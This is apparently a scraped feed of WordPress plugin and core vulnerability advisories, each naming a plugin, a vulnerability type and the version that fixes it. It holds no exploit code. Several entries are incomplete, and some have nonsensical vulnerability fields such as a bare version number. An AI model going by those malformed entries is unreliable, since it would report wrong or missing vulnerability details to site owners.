Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Pro Features Lock Bypass
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Easy Digital Downloads – Invoices

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery in crpClearCache
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.6.0
Recommended Action: Update to version 7.6.0, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: I Recommend This

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.12
Recommended Action: Update to version 4.1.12, or a newer patched version

Plugin: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Disable User Login

Vulnerability: Missing Authorization to Unauthenticated Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Product Import Export for WooCommerce – Import Export Product CSV Suite

Vulnerability: Missing Authorization to CSV Import
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: SIS Handball

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘orderby’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Cross-Site Scripting via source
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Subscriber+ Reflected Cross-Site Scripting
Patched Version: 3.2.18
Recommended Action: Update to version 3.2.18, or a newer patched version

Plugin: Captcha

Vulnerability: 4.4.4
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.44
Recommended Action: Update to version 3.2.44, or a newer patched version

Plugin: MainWP Boilerplate Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.97
Recommended Action: Update to version 2.9.97, or a newer patched version

Plugin: Google Forms

Vulnerability: Unauthenticated PHP Object injection
Patched Version: 0.91
Recommended Action: Update to version 0.91, or a newer patched version

Plugin: RSVP and Event Tickets, Event Management, Events Calendar Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: Woo Custom Checkout Field

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Video Lead Form

Vulnerability: Cross-Site Scripting
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: Awin Data Feed

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Plugin: Advanced Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: White Label CMS

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.14.4
Recommended Action: Update to version 2.14.4, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: Cross-Site Request Forgery to Arbitrary Ban Deletion
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: Thumbs Rating

Vulnerability: Race Condition
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login Configurator

Plugin: CM Tooltip Glossary

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Form Block

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.61
Recommended Action: Update to version 3.0.61, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: ImageInject

Vulnerability: Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Advanced Editor Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: WP Table Builder – WordPress Table Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.10
Recommended Action: Update to version 1.3.10, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Plugin Deactivation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Full Width Banner Slider Wp

Vulnerability: Reflected Cross-Site Scripting via search_term
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated SQL Injection
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Missing Authorization
Patched Version: 5.7.6
Recommended Action: Update to version 5.7.6, or a newer patched version

Plugin: WBW Currency Switcher for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: RSS Includes Pages

Vulnerability: Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Title Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Spicy Blogroll

Plugin: ANAC XML Bandi di Gara

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoast SEO: Local

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 15.0
Recommended Action: Update to version 15.0, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Missing Authorization via save_popup_enabled_state
Patched Version: 1.18.0
Recommended Action: Update to version 1.18.0, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Unauthenticated Arbitrary CSS Appending
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Erident Custom Login and Dashboard

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.9
Recommended Action: Update to version 3.5.9, or a newer patched version

Plugin: WHA Crossword

Plugin: Image Regenerate & Select Crop

Vulnerability: Missing Authorization
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via save
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Jibu Pro

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Path Traversal
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: webapp-builder

Plugin: Limit Login Attempts

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Directory Traversal
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: ActiveHelper LiveHelp Live Chat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Dashboard Widgets Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Libsyn Publisher Hub

Vulnerability: Sensitive Information Exposure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Trust Payments Gateway for WooCommerce (JavaScript Library)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Missing Authorization via delete_pageview
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Dan's Embedder for Google Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.23.11.6
Recommended Action: Update to version 1.23.11.6, or a newer patched version

Plugin: WP Emoji One

Plugin: Live Chat from ClickDesk – Live Chat – Help Desk Plugin for Websites

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Google Map Shortcode

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Cool Tag Cloud

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.26
Recommended Action: Update to version 2.26, or a newer patched version

Plugin: WP Attachment Export

Vulnerability: Arbitrary File Download
Patched Version: 0.2.4
Recommended Action: Update to version 0.2.4, or a newer patched version

Plugin: Tidio – Live Chat & AI Chatbots

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Videopack

Vulnerability: Remote Code Execution
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: illi Link Party!

Plugin: Transposh WordPress Translation

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: eDoc Employee Job Application – Best WordPress Job Manager for Employees

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Missing Authorization on tptn_chart_data
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: product-catalog-8

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Local File Inclusion
Patched Version: 1.3.65
Recommended Action: Update to version 1.3.65, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Failure to Restrict URL Protocol
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Arbitrary Image Upload
Patched Version: 6.9.0
Recommended Action: Update to version 6.9.0, or a newer patched version

Plugin: RapidExpCart

Vulnerability: Authenticated (Level 8/Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Gravity Forms HubSpot

Vulnerability: Various Plugins (Various Versions)
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: VideoWhisper Video Presentation

Vulnerability: Arbitrary File Upload
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Email Marketing for WooCommerce by Omnisend

Vulnerability: Sensitive Information Exposure
Patched Version: 1.13.9
Recommended Action: Update to version 1.13.9, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Unauthorized Form Submission via Disabled Forms
Patched Version: 2.0.3.1
Recommended Action: Update to version 2.0.3.1, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Unauthenticated CSV Injection
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Information Disclosure
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Perfmatters

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Admin+) Cross-Site Scripting and Missing Authorization Checks
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: My Geo Posts Free

Plugin: Redirect 404 to parent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via give_form_grid shortcode
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.77.33
Recommended Action: Update to version 1.0.77.33, or a newer patched version

Plugin: Frontend Post WordPress Plugin – AccessPress Anonymous Post

Vulnerability: Authenticated (Contributor+) Arbitrary Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Omni Secure Files

Vulnerability: Arbitrary File Upload
Patched Version: 0.1.14
Recommended Action: Update to version 0.1.14, or a newer patched version

Plugin: I Recommend This

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: KONTXT Content Advisor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: TrustMate.io – WooCommerce integration

Vulnerability: Authenticated (Subscriber+) Arbitrary Blog Option Update
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Designation Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Arbitrary File Upload
Patched Version: 8.3.8
Recommended Action: Update to version 8.3.8, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: TWChat – Send or receive messages from users

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Enable/Disable Dark Mode
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.4.9
Recommended Action: Update to version 2.1.4.9, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Copperleaf Photolog

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Open Redirect
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WP-Recall – Registration, Profile, Commerce & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 16.24.48
Recommended Action: Update to version 16.24.48, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Unauthenticated CSV Injection
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Find Slow Functions & Actions & Filters & Hooks (Debug Bar)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.41
Recommended Action: Update to version 1.41, or a newer patched version

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Goolytics – Simple Google Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WPPizza – A Restaurant Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.18.3
Recommended Action: Update to version 3.18.3, or a newer patched version

Plugin: WP Admin Logo Changer

Vulnerability: Plugin’s Settings Update via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Remove/hide Author, Date, Category Like Entry-Meta

Plugin: Image Hover Effects – Elementor Addon

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Link Library

Vulnerability: Cross-Site Request Forgery to Library Settings Reset
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 1.5.69
Recommended Action: Update to version 1.5.69, or a newer patched version

Plugin: link-list-manager

Plugin: Gumroad

Plugin: SchedulePress – Auto Post & Publish, Auto Social Share, Schedule Posts with Editorial Calendar & Missed Schedule Post Publisher

Vulnerability: Insufficient Authorization to Authenticated (Contributor+) Arbitrary Post Modifications
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Information Disclosure
Patched Version: 2.5.97
Recommended Action: Update to version 2.5.97, or a newer patched version

Plugin: Event Registration

Vulnerability: SQL Injection
Patched Version: 6.00.03
Recommended Action: Update to version 6.00.03, or a newer patched version

Plugin: WhyDoWork AdSense

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Authentication Bypass
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.20.0
Recommended Action: Update to version 3.20.0, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via AJAX action
Patched Version: 1.3.7.5
Recommended Action: Update to version 1.3.7.5, or a newer patched version

Plugin: Schema – All In One Schema Rich Snippets

Vulnerability: All In One Schema Rich Snippets <= 1.4.4
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: WordPress + Microsoft Office 365 / Azure AD | LOGIN

Vulnerability: Stored Cross-Site Scripting
Patched Version: 15.4
Recommended Action: Update to version 15.4, or a newer patched version

Plugin: Fast WP Speed

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Arbitrary Post Removal via Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Advanced Custom Fields Frontend Forms – ACF Forms – ACF Post Form – ACF Registration Form – ACF Content Form – ACF Profile Form

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Second Street

Vulnerability: Stored Cross-Site Scripting via organization_id
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: Easy Captcha

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Authenticated (Subscriber+) LDAP Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Remote Command Execution
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Newsletter Manager

Vulnerability: Open Redirect
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authorization Bypass
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP BlipBot

Plugin: Page Restriction WordPress (WP) – Protect WP Pages/Post

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Flexible Custom Post Type

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.7
Recommended Action: Update to version 0.1.7, or a newer patched version

Plugin: Vertical marquee plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 7.2
Recommended Action: Update to version 7.2, or a newer patched version

Plugin: Post to Social Media – WordPress to Hootsuite

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: anyfont

Plugin: Restricted Site Access

Vulnerability: Access Bypass via IP Spoofing
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Email Address Disclosure
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Uncanny Toolkit for LearnDash

Vulnerability: Missing Authorization via review-banner-visibility REST route
Patched Version: 3.6.4.4
Recommended Action: Update to version 3.6.4.4, or a newer patched version

Plugin: External Media without Import

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Easy Digital Downloads – Manual Purchases

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: FundEngine – Donation and Crowdfunding Platform

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Custom Content Type Manager

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 0.9.8.6
Recommended Action: Update to version 0.9.8.6, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Referer Cross-Site Scripting
Patched Version: 12.6.4
Recommended Action: Update to version 12.6.4, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authentication Bypass
Patched Version: 7.11
Recommended Action: Update to version 7.11, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Limited Remote Code Execution via um_populate_dropdown_options
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Theme Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: CBX Bookmark & Favorite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.14
Recommended Action: Update to version 1.7.14, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Missing Authorization via settings_reset
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Remove Footer Credit

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: Kv TinyMCE Editor Add Fonts

Plugin: StaffList

Vulnerability: Authenticated SQL Injection
